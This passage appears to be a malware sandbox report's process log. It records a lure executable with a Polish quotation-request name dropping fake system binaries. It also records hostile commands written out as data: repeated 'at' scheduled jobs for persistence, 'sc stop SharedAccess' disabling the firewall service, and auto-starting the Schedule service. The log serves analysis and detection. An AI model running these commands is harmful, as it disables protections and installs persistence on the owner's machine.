                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccess
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start Schedule
                    Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System\explorer.exe "C:\windows\system\explorer.exe" RO
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                    Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess created: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " Jump to behavior
                    Source: C:\Users\user\Desktop\ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exeProcess created: C:\Users\user\AppData\Local\icsys.icn.exe C:\Users\user\AppData\Local\icsys.icn.exeJump to behavior
                    Source: C:\Users\user\Desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "c:\users\user\desktop\zapytanie ofertowe st-2024-s315 cpa9170385.exe " Jump to behavior
                    Source: C:\Users\user\AppData\Local\icsys.icn.exeProcess created: C:\Windows\System\explorer.exe c:\windows\system\explorer.exeJump to behavior
                    Source: C:\Windows\System\explorer.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe SEJump to behavior
                    Source: C:\Windows\System\spoolsv.exeProcess created: C:\Windows\System\svchost.exe c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\System\spoolsv.exe c:\windows\system\spoolsv.exe PRJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop SharedAccessJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe sc start ScheduleJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: C:\Windows\SysWOW64\at.exe at 08:10 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exeJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System\svchost.exeProcess created: unknown unknownJump to behavior
